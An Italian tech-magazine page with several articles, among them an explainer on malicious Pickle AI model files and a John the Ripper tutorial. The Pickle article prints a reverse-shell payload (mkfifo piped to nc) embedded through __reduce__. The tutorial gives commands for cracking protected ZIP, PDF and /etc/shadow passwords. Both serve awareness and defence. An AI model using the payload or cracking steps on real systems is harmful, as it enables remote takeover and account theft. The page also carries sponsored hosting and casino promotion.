Articoli
Sicurezza informatica nelle smart city: costruire strutture urbane resilienti
Nel pieno dell’avanzata di uno sviluppo tecnologico senza limiti, ogni giorno vengono a galla tantissimi nuovi termini che pian piano diventano di uso comune e ai quali bisogna adattarsi e comprenderli al più presto, quantomeno per scongiurare il pericolo di non rimanere indietro in questa corsa frenetica.
Tra le tante parole che spesso vengono associate alla moderna tecnologia, troviamo sicuramente “smart”. Ed è così che il telefono cellulare è diventato lo smartphone, i televisori sono diventati smart tv, per non parlare delle smartbox, degli smartwatch e di tutti gli altri device intelligenti di nuova generazione. Nell’ultimo periodo è sorto un altro termine smart, quello delle smart city, o città intelligenti, che andremo a conoscere nelle prossime righe.
Che cosa sono le città intelligenti?
Con il termine “smart city”, ovviamente, non ci riferiamo agli agglomerati urbani dove risiedono persone con un quoziente intellettivo superiore. Si tratta di vere e proprie città che in ambito di urbanistica e di architettura, racchiudono una pianificazione di strategie per ottimizzare e innovare la messa a disposizione e la fruizione dei servizi pubblici.
Questo avviene principalmente tramite l’utilizzo diffuso di nuove tecnologie, soprattutto relative alla comunicazione, alla mobilità, alla cura dell’ambiente, all’efficienza energetica ed altri ambiti a rotazione. Lo scopo ultimo di tutta questa pianificazione è quello di migliorare il più possibile la qualità della vita degli abitanti della città, e ovviamente anche quella dei turisti che la visitano.
Innovazione da tutelare
Grazie alla definizione data poco sopra, si capisce come insieme alle città intelligenti, sia emerso il bisogno di tutelare quest’ultime. Le smart city funzionano grazie all’integrazione di diverse tecnologie e alla loro comunicazione, principalmente quella di raccolta dati e quelle che li analizzano. Le prime, come il nome lascia intendere, servono solamente come un grande cestino di raccolta, nel quale vengono deposte tutte le informazioni relative a determinati settori, mentre la seconda fa il lavoro più complicato, ovvero quello di analizzare questa enorme mole di informazioni ed estrapolarne dati dettagliati in modo da offrire direzioni da intraprendere nello sviluppo, in modo tale da migliorare le varie esigenze cittadine.
Ovviamente tutti questi dati necessitano di essere tutelati, sia per una questione di privacy che per questioni di possibili manomissioni. Se qualche malintenzionato ottenesse l’accesso a questi dati, potrebbe modificarli e renderli nulli, o peggio ancora, fornire informazioni false che non aiuterebbero lo sviluppo e il miglioramento della smart city. Proprio per evitare questo, ogni modello di smart city adotta il principio di privacy e trasparenza sui dati raccolti, e ne garantisce la sicurezza.
Conoscenza e tutela della propria città intelligente
Le città intelligenti sono un bene da sviluppare e, soprattutto, da proteggere. Evolvendosi, le smart city potranno avere un impatto sempre più diretto sulla qualità della vita di chi le abita, apportando notevoli benefici in più settori, turismo compreso. Per proteggersi bisogna innanzitutto sapere quale sia la minaccia, e qui entra in gioco un sistema di mappatura della città. In questa mappatura vengono raccolte tutte le informazioni relative alle tecnologie utilizzate all’interno della smart city, e il loro impiego specifico.
In alcuni casi, in quelli che azzardiamo definire i migliori, quando si effettua questa mappatura vengono tenute in considerazione anche le potenziali tecnologie che potrebbero essere impiegate in futuro. Una volta capito quali tecnologie sono in gioco nella smart city, il passo successivo è quelle di tenerle separate tra di loro, in modo da limitare i danni in caso di un eventuale attacco. Anche se è difficile da capire, si tende a tenere queste tecnologie separate ma connesse allo stesso tempo.
Protezioni sempre attive
Proprio come avviene nei computer o sugli smartphone, la protezione di questi sistemi informatici e dati sensibili, avviene tramite software in grado di individuare e difendersi da eventuali virus e malware, anche tramite sistemi tecnologicamente avanzati di criptazione dei dati. Vista l’importanza di queste informazioni, la loro protezione non può assolutamente essere presa sottogamba.
Foto di apertura di Marc-Olivier Jodoin su Unsplash
Articoli
Cervelli biologici sotto sale
Se fino a qualche anno fa tutti dovevano mettere le mani su una blockchain, ormai la nuova novità è l’intelligenza artificiale, in particolare i modelli generativi. In realtà la tecnologia non è così nuova: l’intelligenza artificiale esiste, sostanzialmente, da quando esistono i computer. Persino le reti neurali generative non sono una cosa particolarmente nuova. Il motivo per cui hanno avuto un improvviso successo è che sono finalmente diventate abbastanza efficienti da poterci fare davvero qualcosa. Il problema di simulare un cervello biologico è sempre stato l’enorme numero di operazioni da svolgere, soprattutto per l’allenamento della rete neurale, e procedendo sequenzialmente come fa una CPU ci vuole troppo tempo. Ma, da alcuni anni, le GPU hanno raggiunto un grado di sviluppo per cui ogni volta che ne viene rilasciata una nuova generazione (ogni 2 anni, circa) riesce a eseguire almeno 20 o 30 volte il numero di operazioni parallele di quella precedente. Questo permette oggi l’allenamento di reti neurali con decine di miliardi di neuroni in un tempo ragionevolmente breve (misurabile in ore, che varia a seconda dei casi), invece di impiegare anni, anche usando delle schede grafiche “consumer”. Naturalmente si tratta pur sempre di oggetti costosi, da alcune migliaia di euro, ma è un investimento tutto sommato abbordabile. Soprattutto per le aziende, che non vedono l’ora di appiccicare il bollino “made with AI” ai loro prodotti.
C’è in realtà un’altra cosa che, soprattutto nell’ultimo anno, ha dato un forte impulso proprio ai modelli generativi, cioè i modelli di rete neurale allenati per generare dei contenuti (immagini, musica, e testi). E questa cosa, come spesso capita, è la filosofia open source. Le principali aziende che hanno investito in questa tecnologia hanno, infatti, capito che il modo migliore per continuare a innovare è invogliare sviluppatori e appassionati da tutto il mondo a collaborare con nuove idee. È in questa logica che una piattaforma come HuggingFace ha trovato il proprio successo: sulla sua community è possibile pubblicare i propri modelli di rete neurale, provarli, e scaricare quelli di altri utenti. Questo permette a chiunque di non dover partire da capo, ma di prendere un modello preesistente e poi allenarlo con i propri dati, per adattarlo alle proprie necessità.
Naturalmente, alla fine si tratta in buona parte di un grosso “repository”, dal quale scaricare modelli per l’IA, un po’ come GitHub è un grosso contenitore in cui chiunque può caricare qualsiasi cosa. Sta all’utente assicurarsi di scaricare solo software fidato, invece di installare sul proprio sistema il primo malware che capita. E questo vale anche per i modelli IA.
Tanti numeri in fila per uno
È molto importante capire che, semplificando un po’, alla fine un “modello” di IA è una collezione di “pesi”, cioè una sfilza di numeri che stabilisce come siano collegati tra loro i neuroni della rete. Cambiando i pesi, la rete neurale si comporta in modo diverso. È meno prevedibile del cambiare una riga di codice in un programma tradizionale ma, alla fine dei conti, non è altro che un algoritmo che esegue operazioni sulla CPU (o sulla GPU, ma l’inferenza funziona bene anche su CPU). Essendo molto complesso e poco prevedibile, è improbabile (seppure non impossibile), che qualcuno possa realizzare un malware cambiando a mano i pesi di un modello. Almeno al giorno d’oggi.
Ma non è tutto qui: c’è un dettaglio importante del meccanismo di memorizzazione e condivisione dei modelli per Python, il linguaggio di programmazione più diffuso per l’intelligenza artificiale. Un dettaglio che può offrire a un malintenzionato la possibilità di eseguire direttamente comandi sul sistema su cui viene caricato il modello, fino a prenderne il controllo remoto. Hugging Face supporta i principali motori per AI basati su Python, in particolare TensorFlow e PyTorch. I modelli caricati su HF sono degli archivi che contengono diversi file. Uno di questi è il config.json, che contiene le informazioni necessarie per configurare il motore (per esempio PyTorch) con la corretta struttura prevista della rete neurale che si vuole creare. Un altro file importante è il modello vero e proprio, il set dei pesi della rete neurale, che viene memorizzato nel formato Pickle.
Pickle è un “serializzatore” per oggetti Python. Il modello, infatti, non è altro che un array multidimensionale, e per scriverlo su un file bisogna mettere in serie tutti i vari numeri. Sostanzialmente, un po’ come la prospettiva è uno strumento per rappresentare su un foglio degli oggetti tridimensionali. Pickle è un formato binario piuttosto flessibile, si possono serializzare non solo oggetti “statici” come gli array, ma anche intere funzioni: all’interno del file vengono infatti scritte delle istruzioni in una sorta di bytecode, che è molto più efficiente per il caricamento nella RAM rispetto a leggere da un file JSON oppure all’interpretazione di codice Python. Per esempio, un semplice array monodimensionale si può serializzare così:
pickled = pickle.dumps([‘pickle’, ‘me’, 1, 2, 3])
E il bytecode Pickle risultante è questo:
0: \x80 PROTO 4
2: \x95 FRAME 25
11: ] EMPTY_LIST
12: \x94 MEMOIZE (as 0)
13: ( MARK
14: \x8c SHORT_BINUNICODE ‘pickle’
22: \x94 MEMOIZE (as 1)
23: \x8c SHORT_BINUNICODE ‘me’
27: \x94 MEMOIZE (as 2)
28: K BININT1 1
30: K BININT1 2
32: K BININT1 3
34: e APPENDS (MARK at 13)
35: . STOP
Per un array così semplice sembra uno spreco, ma in realtà per oggetti molto più grandi (i modelli AI pesano spesso molti GigaByte) questo meccanismo rende molto più efficiente il caricamento. Questo però significa che in un file Pickle è possibile inserire qualunque tipo di istruzione, eventualmente anche codice malevolo. Questa non è di per sé una vulnerabilità, è solo una caratteristica di questo formato. La vulnerabilità sta nel comportamento degli utenti: bisogna capire che Pickle è un formato binario, difficile da “disassemblare”, e quindi i modelli per AI devono essere trattati come delle “blackbox”. Cioè, devono essere considerati come sempre potenzialmente pericolosi, e bisogna scaricarli solo da fonti sicure, esattamente come si farebbe per un programma binario. Bisogna, insomma, sempre ricordare che si sta eseguendo un software sul proprio sistema, quindi è necessario essere sicuri che questo non faccia nulla di malevolo. Infatti, inserire degli shellcode in un file Pickle è estremamente semplice:
import pickle
import base64
import os
class RCE:
def __reduce__(self):
cmd = (‘rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | ‘
‘/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f’)
return os.system, (cmd,)
if __name__ == ‘__main__’:
pickled = pickle.dumps(RCE())
Che poi viene tradotto nel file pkl più o meno in questo modo:
0: \x80 PROTO 4
[…]
376: R REDUCE
377: q BINPUT 37
379: X BINUNICODE ‘ignore’
390: q BINPUT 38
392: c GLOBAL ‘posix system’
406: q BINPUT 39
408: X BINUNICODE “rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f”
474: q BINPUT 40
476: \x85 TUPLE1
477: q BINPUT 41
479: R REDUCE
480: q BINPUT 42
482: u SETITEMS (MARK at 33)
Quello che stiamo serializzando non è semplicemente la stringa del comando shell da eseguire, ma proprio la chiamata alla funzione os.system, quindi Pickle quando esegue il bytecode finisce per lanciare direttamente il comando sulla shell di sistema. A essere inserito nel file Pickle è infatti proprio il codice della funzione os.system se scriviamo:
return os.system()
la funzione viene eseguita e otteniamo solo il suo output.
Se invece scriviamo:
return os.system
otteniamo un puntamento alla funzione stessa, pronta per essere eseguita in un secondo momento. E quel momento arriva quando il Pickle viene deserializzato e caricato in memoria. I ricercatori di Wiz, società di sicurezza informatica, hanno provato a prendere addirittura un modello realmente funzionante, GPT2, e aggiungere delle istruzioni alla fine, proprio per eseguire dei comandi sulla shell. E funziona perfettamente, senza nemmeno provocare errori durante il caricamento nella rete neurale di PyTorch. Questo significa che l’utente che scarica e esegue il modello sul proprio PC o server non si accorge nemmeno di quello che sta succedendo: dal suo punto di vista, il modello linguistico funziona correttamente.
Entità della vulnerabilità
Visto il gran numero di utenti e aziende che provano a utilizzare reti neurali generative, e visto che i modelli Pickle per PyTorch sono di fatto il principale standard in questo campo, il pericolo è piuttosto diffuso. Ma è importante ricordare che non tutti i modelli disponibili su HuggingFace sono malevoli. In particolare, non lo sono di certo quelli prodotti da grandi aziende o da community open source. Sicuramente, il fatto che siano binari rende difficile persino per i gestori di Hugging Face scansionarli alla ricerca di malware. E, considerando anche il fatto che i modelli generativi vengono tipicamente, utilizzati su macchine (fisiche o virtuali) piuttosto potenti, c’è il rischio che qualche malintenzionato possa mettere in circolare un modello che gli offre delle shell remote, per ritrovarsi così con una grossa botnet al suo comando.
La soluzione
Essendo questa possibilità di inserire chiamate di sistema dentro un file Pickle, una normale caratteristica del formato, non c’è una vera soluzione. L’unico modo per essere protetti è una catena di fiducia tra tutti i vari passaggi, dal primo autore del modello a chi lo ha integrato allenandolo con altri dataset. Spesso, infatti, si trovano versioni “personalizzate” di modelli pubblicamente disponibili, più adatte a qualche particolare contesto (per esempio, allenate con documenti medici, oppure sportivi). È spesso questi modelli vengono rielaborati e integrati a loro volta. Ma basta che uno di questi “intermediari” non sia affidabile per rendere potenzialmente insicuro il modello finale. Bisogna ripensare ai tempi in cui si scaricavano eseguibili crackati da eMule: quante volte è capitato di provare a eseguire l’ultima versione di Photoshop, solo per accorgersi che in realtà (nella migliore delle ipotesi) era uno spyware che farciva il browser di banner e popup, magari inviando anche email di spam a tutti i contatti? Quando utilizziamo un software senza conoscerne la provenienza dobbiamo sempre mettere in conto la possibilità che chi ce lo ha condiviso possa averci inserito un malware. Un modo per, letteralmente, contenere i potenziali danni è la containerizzazione. Se, infatti, PyTorch e il modello vengono caricati dentro un container a se stante, separato dal resto delle applicazioni che lo andranno a utilizzare, è possibile limitare le risorse che potrà utilizzare, eventualmente impedirne l’accesso a internet (evitando shell remote), e soprattutto evitare un accesso diretto a file sensibili (che verranno passati al momento via API e tenuti in memoria solo per il tempo di elaborazione).
A cura di Luca Tringali
Leggi anche: “La cybersecurity nell’era dell’IA“
Articoli
Come migliorare la velocità del sito WordPress con un hosting ottimizzato
La nostra è l’epoca digitale per eccellenza. Ciò significa che la maggior parte di noi non solo usa internet come utente, ma anche e soprattutto per spirito imprenditoriale. E chi gestisce o intende aprire un sito WordPress non può sottovalutare un aspetto in particolare: la velocità.
Premessa: la velocità influenza l’esperienza del sito a 360°. Non solo migliora il tempo di caricamento, ma dà la possibilità agli utenti di navigare sul sito senza intoppi. Cosa fanno gli utenti quando il sito carica in modo lento? Ne trovano un altro.
C’è un modo, però, per migliorare questo aspetto: l’hosting ottimizzato. Questo servizio, appositamente progettato, offre prestazioni elevate per i siti WordPress. Un esempio concreto è l’hosting di Serverplan, che non solo garantisce tempi di caricamento rapidi, ma integra anche un nuovo sitebuilder AI, incluso in alcuni piani. Questo strumento permette di creare e personalizzare il proprio sito in modo semplice e intuitivo, sfruttando l’intelligenza artificiale per ottimizzare automaticamente la struttura e le prestazioni del sito, senza richiedere competenze tecniche avanzate.
Visita questa pagina per scoprire le soluzioni di hosting WordPress offerte da Serverplan e il nuovo sitebuilder AI, ideale per migliorare la tua presenza online con un sito veloce ed efficiente.
Perché la velocità del sito è importante?
Per chi gestisce un progetto online, la velocità di caricamento di un sito web ne determina il successo stesso: alcuni dei motivi per cui è tanto essenziale dedicare attenzione a questo aspetto li abbiamo già elencati.
Come anticipato, un sito web lento è a dir poco frustrante per gli utenti e aumenta nettamente il tasso di abbandono. L’obiettivo è di offrire un’esperienza fluida e piacevole, così da incoraggiarli a rimanere sulla piattaforma ed esplorare i contenuti, con un ritorno importante sul coinvolgimento e sulla fidelizzazione.
Non solo: la velocità è tra i fattori di ranking utilizzati dai motori di ricerca come Google per valutare le prestazioni di un sito. Se non carica bene, sicuramente possono esserci delle ripercussioni in termini di visibilità nei risultati di ricerca e posizionamento organico.
L’hosting influenza la velocità del sito
Prima di tutto, l’hosting influenza non solo la velocità del sito, ma anche le prestazioni stesse. Pertanto, propendere per una soluzione ottimizzata significa credere davvero nel proprio progetto e investire al meglio.
Con un hosting di qualità, si vanno a ridurre i tempi di caricamento delle pagine e molti fornitori come Serverplan si impegnano per fare la differenza per i propri clienti.
Ci sono, nello specifico, dei fattori che influenzano la velocità del sito, ovvero la localizzazione dei server, l’uso di Content Delivery Network (CDN) e la capacità di uptime.
Naturalmente, il supporto tecnico è un ulteriore punto di riferimento, perché, nel momento in cui si verificano problemi al sito, dobbiamo essere assolutamente certi di intervenire nel minor tempo possibile.
La scelta dell’hosting giusto fa sempre la differenza
Le opzioni a nostra disposizione al giorno d’oggi sono molteplici: internet è un mondo (davvero) vasto; quindi, abbiamo la possibilità di valutare diversi fornitori di hosting.
Ciò che non dobbiamo mai dimenticare è di valutare le risorse e le prestazioni offerte dal provider: dobbiamo essere certi che possano soddisfare le nostre esigenze attuali e future del sito.
Per fare un esempio concreto: il sito può crescere nel tempo – si spera! – quindi sapere di poter offrire un servizio costante e veloce nel tempo è molto importante per gli imprenditori.
Altri criteri da non sottovalutare mai? Sicurezza, backup e, come anticipato, il supporto tecnico: con un hosting ottimizzato, navigare sul proprio sito non è mai stato così facile.
Articoli
John The Ripper: lo scardina tutto!
Ecco come funziona lo strumento che facilita il cracking delle password da file ZIP, RAR, PDF e… forse anche del pinguino!
Ormai lo sappiamo: John the Ripper è un cracker di password gratuito e open source, che consente ai professionisti della sicurezza di decifrare una vasta gamma di password, indipendentemente dal fatto che siano crittografate o protette da codici di autenticazione. È uno strumento incluso nei repository predefiniti di molte distribuzioni Linux, tra cui Ubuntu e Debian, ed è installato di default nella maggior parte delle distribuzioni di penetration test, come Kali Linux e BlackArch Linux. Ma se la distribuzione Linux non lo integra, per installarlo si parte dal seguente comando:
$ apt install John
Mentre, se si adopera un computer Mac, è possibile procedere con l’installazione digitando da una finestra di terminale:
$ brew install john
È possibile installare il software anche su Windows: puntare il browser su https://www.openwall.com/john ed effettuare il download dello ZIP a 64 bit dei binari Microsoft Windows (a oggi 1.9.0-jumbo-1 64-bit Windows binaries.zip), quindi estrarre il contenuto dell’archivio. Basterà poi aprire il prompt dei comandi e spostarsi nella cartella scompattata per poter lanciare il comando John.
MODALITÀ DI CRACKING
John The Ripper utilizza una serie di tecniche sofisticate per decifrare gli hash delle password. Il principale metodo d’attacco impiegato è quello detto attacco a dizionario, in cui vengono processate una serie di parole predefinite o comuni, spesso estratte da wordlist gratuite e aggiornate o personalizzate dall’utente. Questo approccio mira a trovare corrispondenze esatte tra le parole del dizionario e gli hash delle password. Poiché molte persone continuano a riutilizzare le stesse password e non le modificano dopo una violazione di sicurezza, tali attacchi stanno diventando sempre più efficaci! Questo perché, in seguito a una nuova violazione, le credenziali compromesse vengono aggiunte da hacker o aspiranti tali ai più blasonati dizionari, accessibili online. Kali Linux fornisce già diversi eccellenti dizionari di password, il più utilizzato è Rockyou.txt, un semplice file di testo contenente un elenco di password comunemente utilizzate e trapelate durante diverse violazioni dei dati, altre risorse sono disponibili in repository online, per esempio su GitHub.
Oltre a operare in modalità Single Crack, può essere utilizzato anche in modalità Incremental Mode, eseguibile con il comando:
john –incremental hash.txt
In questa modalità per individuare la password vengono provate tutte le possibili combinazioni di caratteri. L’External mode consente, invece, all’utente di usare delle funzioni personalizzate scritte ad hoc, per esempio in linguaggio C.
Utilizzo responsabile del software
L’impiego di John the Ripper, così come di qualsiasi altro strumento di cracking delle password, può costituire un’attività sia legale che illegale, a seconda del contesto e dell’intento dell’utilizzatore. È fondamentale che l’utente sia consapevole e rispetti appieno le normative vigenti nel proprio paese o giurisdizione in materia di sicurezza informatica e privacy. In tal senso, prima di avvalersi di tali strumenti, è necessario ottenere il consenso esplicito e l’autorizzazione legale da parte dei titolari delle risorse informatiche coinvolte, nonché rispettare scrupolosamente le policy in tema di sicurezza dei dati. Nel caso in cui sorgano dubbi circa la legalità di determinate attività di cracking delle password, è vivamente consigliabile ricorrere alla consulenza di un esperto legale specializzato in diritto informatico, al fine di valutare attentamente la situazione e ricevere le necessarie indicazioni e chiarimenti in merito. Solo attraverso un approccio etico e conforme alla normativa vigente sarà possibile utilizzare questi strumenti in modo responsabile e legalmente corretto.
IN PRATICA
COSÌ CRACKANO LE PASSWORD DEI FILE ZIP, RAR E PDF
Come i pirati usano John The Ripper e un tool di supporto per craccare i file protetti da password.
LO ZIP È PROTETTO
Supponiamo l’hacker abbia recuperato un nostro file ZIP protetto dalla password “cielo1234”; ogniqualvolta egli proverà ad accedere al contenuto del file, il sistema gli chiederà la password di accesso; il malintenzionato non demorde e usa John The Ripper per individuarla.
ZIP2JOHN E RAR2JOHN
Per creare l’hash da far elaborare a John The Ripper, l’hacker ricorre al tool zip2john. Nello specifico, dalla sua distro Kali lancia il comando sudo zip2john fileziprotetto.zip > hash-hj.txt (Invio). In pochi secondi il sistema genererà il file hash-hj.txt. Per i file .rar l’hacker avvierà il comando rar2john.
IN AZIONE
Il malintenzionato può ora ricorrere alla potenza di John The Ripper per estrapolare la password di accesso allo ZIP. Per farlo proverà, per esempio, un attacco a dizionario con il comando john –format=zip hash-hj.txt –wordlist=/usr/share/wordlists/rockyou.txt (Invio).
LA PASSWORD È SERVITA!
Con il comando è stato indicato a JTR di utilizzare il dizionario rockyou.txt (presente di default nella distribuzione Kali Linux, andrà solo scompattato essendo uno ZIP) per craccare la password. Dopo qualche minuto, il tool indicherà la password individuata, in questo caso “cielo1234”.
E SE C’ È UN PDF?
Anche nel caso di un PDF protetto da password, John The Ripper può scardinare la protezione, in questo caso il malfattore ricorre a un tool simile a zip2john o rar2john, nello specifico lancia il comando pdf2john, ad esempio pdf2john filepdfprotetto.pdf > hash-hj-pdf.txt (Invio).
ET VOILÀ
A questo punto John The Ripper può completare il lavoro, supponendo sempre un attacco a dizionario viene impartito il comando john –format=pdf hash-hj.pdf.txt –wordlist=1000000-password-seclists.txt e ottenere dopo qualche minuto la password. Notate l’utilizzo, a scopo dimostrativo, di un diverso dizionario da rockyou.
TESTIAMO LA ROBUSTEZZA DELLE PASSWORD
John non è solo utile agli hacker, può anche essere impiegato da esperti di sicurezza per valutare l’efficacia delle password usate in Linux
DOVE SONO NASCOSTE LE PASSWORD?
Le password Linux criptate sono salvate nei percorsi /etc/passwd (contiene info su username, user id, descrizione dell’account etc) ed /etc/shadow, che memorizza l’hash delle password, la data di scadenza e dell’ultimo cambio password effettuato e altre informazioni.
INDICHIAMO I FILE DA ANALIZZARE
Il comando unshadow è un’utility utilizzata su Linux per combinare i file /etc/passwd e /etc/shadow al fine di preparare i dati delle password per ulteriori operazioni o analisi. In questo caso per fornirle a John: unshadow /etc/passwd /etc/shadow > pwdlinux.txt.
PREPARIAMO IL FILE HASH
Lanciando ora il commando john –format=crypt –wordlist=/usr/share/wordlists/rockyou.txt pwdlinux.txt, il tool proverà a individuare le password, adoperando il dizionario rockyou.txt, di tutti gli utenti contenuti nel file precedentemente creato: pwdlinux.txt.
MOSTRIAMO LE PASSWORD
L’operazione può richiedere diversi minuti. Invece del dizionario rockyou si può adoperare qualunque altro dizionario, oppure adoperare John The Ripper sfruttando qualche altra modalità di utilizzo di cui abbiamo accennato in questo (speriamo gradito) approfondimento.
Leggi anche: “Rubate 10 miliardi di password“
Articoli
L’avanzata dei dispositivi pieghevoli
Smartphone piegati attorno al polso, computer il cui schermo si apre e si chiude a metà, dispositivi tutti di vetro
(o quasi): sembrava fantascienza, ma ormai è tutto vero!
È nata come un’idea dei designer di Hollywood. Mostrare apparecchi futuristici nei film e nelle serie TV. Da Westworld a The Expanse passando per Star Trek, Altered Carbon e Black Mirror: non c’è set del futuro che non ne abbia un buon numero. Perché? La risposta è semplice: sembrano tecnologie del futuro. Perché il problema degli scenografi di film e telefilm è rendere credibili le serie di fantascienza con gadget che agli occhi di noi spettatori moderni, che siamo abituati ogni anno a vedere le meraviglie di nuovi smartphone, tablet e laptop, sembrino davvero “del domani”. Come si fa? Semplice: si creano gadget impossibili: tutti di vetro e per di più pieghevole.
Il futuro è qui
Adesso, però, la tecnologia è arrivata e i dispositivi con schermo pieghevole, e addirittura curvo, ci sono. Pian piano i prezzi stanno scendendo e le novità si susseguono. I primi a commercializzare questi dispositivi sono stati i colossi dell’ambito telefonico, ma anche altri settori stanno seguendo. Per esempio, la possibilità di creare computer portatili che si aprono e mostrano schermi dalle dimensioni doppie. Oppure, poter mettere al polso un dispositivo metà orologio e metà telefono con lo schermo curvo che corre attorno al polso. E i televisori da cento pollici “arrotolabili”, che scompaiono dentro la base quando non servono. Senza contare gli schermi completamente trasparenti, le superfici dei ripiani di casa o dell’ufficio che diventano smart mostrando informazioni. Samsung ha mostrato una serie di prototipi al recente CES con apparecchi tutto schermo e tutti pieghevoli: verticalmente, orizzontalmente, a soffietto, a pagine alterne come dei cataloghi.
Lo sbarco dei pieghevoli
Le tecnologie oggi ci sono e soprattutto è stato risolto il problema della piega. Perché, se è vero che gli schermi che si possono ripiegare, esistono grazie agli Oled con base in plastica e non in vetro e con spessori ultrasottili, a fare la differenza per ridurre l’attrito dell’uso è il meccanismo di attuazione. Dalle ghiere meccaniche pensate da Lenovo per i suoi laptop tutto schermo e dalla controllata Motorola per gli smartphone, agli ingegnosi sistemi made in Corea che oggi sembrano tra i più affidabili.
Il telefono tutto schermo da polso è ancora un prototipo. L’ha realizzato Samsung, si chiama Cling Band ed è stato mostrato all’ultimo Mobile World Congress. È un bracciale intelligente, un incrocio tra orologio (più piccolo) e smartphone (più grande). Si piega nel senso che si adatta alla dimensione del polso e rimane fermo là, fornendo in maniera naturale tutte le informazioni che servono (dai messaggi alla navigazione Web), oltre ai dati raccolti dai sensori per il monitoraggio dei parametri vitali, come la frequenza cardiaca e i livelli di ossigeno nel sangue.
Per questo come per altri prototipi e concept ancora non c’è una data di uscita, ma la certezza è che ormai le tecnologie sono pronte. E i maghi degli effetti speciali di Hollywood adesso si dovranno inventare qualcosa di nuovo per poterci stupire ancora.
*illustrazione articolo progettata da Freepik
Leggi anche: “Steam Deck Oled è disponibile“
Articoli
Come giocare in sicurezza
Il gioco online è una perfetta manifestazione del tempo moderno. Ci si ritrova davanti ad un pc per collegarsi a siti riconducibili ad un certo tipo di attività ludica. Tra queste il casinò è, di certo, una delle più gettonate. Giocare si può, ma una certa dose di sicurezza e raccomandazione è doverosa in questi casi, onde evitare di incappare in brutte situazioni.
Considerando anche che la pubblicità sul gioco d’azzardo è molto limitata a causa di una regolamentazione molto ferrea, è importante – se si vuol provare a tentare la fortuna – che si giochi in tutta sicurezza.
Perché anche i soldi persi per errore, non solo quelli del gioco, non sono recuperabili. O, comunque, è molto difficile magari rintracciare l’autore del furto.
Consigli utili sulla sicurezza nel casinò online
La sicurezza e l’autocontrollo sono due elementi essenziali per chi gioca al casinò. Ancor di più quando si gioca online e non si ha la percezione esatta del luogo fisico. La tentazione di giocare ancor di più aumenta in questi casi.
Diventa ancora più determinante il tema della sicurezza online. La prima accortezza a cui pensare nel momento in cui si apre un account su un sito specializzato riguarda la scelta delle password.
Al fine di evitare che qualche malintenzionato possa intrufolarsi nel suddetto account a fini di truffa sarebbe preferibile scegliere una password quanto più complessa possibile. L’aggiunta di lettere maiuscole, oltre che minuscole, insieme a caratteri speciali aiuta tantissimo in questo senso.
Scegliere una password unica per gli account in comune è una mossa altrettanto intelligente, fermo restando la complessità imprescindibile della password stessa. Uno standard di sicurezza ancora più elevato lo si raggiunge nel momento in cui l’autenticazione all’interno del sito avviene su un doppio binario.
Oltre alle password da inserire può essere richiesto all’utente di attivare l’identificazione tramite codice di notifica sull’app installata. Un parametro di sicurezza in più che può finire quantomeno per scoraggiare gli hacker.
Utilizzare il firewall come barriera contro gli accessi non autorizzati, sia a livello hardware che software, dà un’ulteriore spinta all’efficienza della sicurezza online Giocare al casinò è una scommessa a tutti gli effetti e l’obiettivo principale deve essere orientato ad un certo senso di responsabilità, anche magari prima testando qualcosa senza spendere un euro e cercando le informazioni dei bonus con giri gratis ai casino. In caso contrario si finisce per perdere tanti soldi.
Metodi di pagamento con sicurezza certificata per gioco online
Il casinò online è un’ottima opportunità per fare soldi “facili”. Sulla carta, ovviamente. Basterebbe indovinare il numero giusto alla roulette o le carte vincenti al poker per incrementare i propri guadagni. Anche se non è così semplice. Ma in questi casi bisogna stare ben attenti a ciò che si fa.
I metodi di pagamento più sicuri e attendibili fanno riferimento a portafogli elettronici come possono essere Paypal, Skrill, Neteller, SafeCharge. Aumentando il livello di sicurezza di un account connesso ad un sito aumenta, di conseguenza, l’affidabilità di un metodo di pagamento con carta di credito o debito Mastercard, Visa, Maestro, Postepay e quant’altro.
Altre opzioni riguardano bonifici bancari, voucher ed Apple Pay. I depositi su casinò online sono pressoché immediati, mentre le tempistiche dei prelievi dalle 24 ore di Paypal fino ai 5 giorni lavorativi previsti per un semplice bonifico. In ogni caso stabilire un limite di deposito e puntate giornaliero, oltre che mensile, aiuta a contenere le perdite in maniera sostanziale.
Come scegliere piattaforme più affidabili per il casinò online
Il casinò online è uno dei giochi più praticati dagli utenti sia sul piano ludico che professionale. Naturalmente, non tutti i siti di riferimento sono da seguire. Bisogna affidarsi solamente a quelli certificati e che garantiscono una certa tutela in termini di gioco e condizioni.
I criteri da seguire nella selezione dei migliori operatori sul mercato riguardano, anche e soprattutto, parametri di sicurezza, bonus, metodi di pagamento e assistenza clienti.
Ormai, infatti, questi pre-requisiti sono un qualcosa che viene dato per assoluta certezza anche se spesso può non essere così. Il consiglio è quello di affidarsi sempre a casinò certificati e che abbiano buone recensioni. Possibilmente recensioni veritiere e fatte da utenti che effettivamente abbiano testate quel casinò online.
Come? Semplicemente, vedere quante recensioni ha quell’account in quel portale e, soprattutto, se racconta degli episodi specifici e non va troppo nel vago. Se, infatti, dovesse essere molto generale, probabilmente si è di fronte a una recensione che è stata pilotata. Quindi, prestare la massima attenzione su ciò deve essere un must da non mettere in secondo piano. Certo, magari alcune app possono anche rallentare la memoria del CPU, fondamentale per il suo funzionamento, ma la sicurezza va messa al primo posto.
Quali sono i rischi di giocare online
Giocare online stimola la mente e crea aspettative elevate in termini di soddisfazione e patrimonio personale. Ma anche qui bisogna stare ben attenti a dove e come si gioca.
I pericoli sono dietro l’angolo. Il tema del phishing, ad esempio, è piuttosto ricorrente e si annovera nell’alveo delle truffe più comuni in circolazione, soprattutto tra le persone di età più avanzata. Basta una chat per entrare nella trappola dei cybercriminali e vedersi privati dei propri dati personali. Tutto ciò avviene attraverso un collegamento via chat, magari durante il gioco, che successivamente rimanda ad una mail dall’intento malfattore. Mai aprirla.
C’è il rischio ulteriore di andare incontro ad un furto d’identità. La funzione delle chat durante il gioco è stimolante, ma allo stesso tempo può divenire pericolosa se affrontata nel modo sbagliato.
Potrebbero facilmente introdursi all’interno di suddette chat persone malintenzionate con l’obiettivo di raccogliere informazioni sensibili. Inutile dire che bisogna prestare attenzione massima a questo tipo di pratica.
Emergono sotto questo profilo altri fenomeni, ancora più gravi, come doxing e swatting. In questi casi si arriva persino a divulgare online informazioni sensibili di una persona come nome, indirizzo di residenza e luogo di lavoro, mettendo a repentaglio, in casi estremi, la sua incolumità. Il tutto, naturalmente, senza alcuna autorizzazione da parte della vittima.
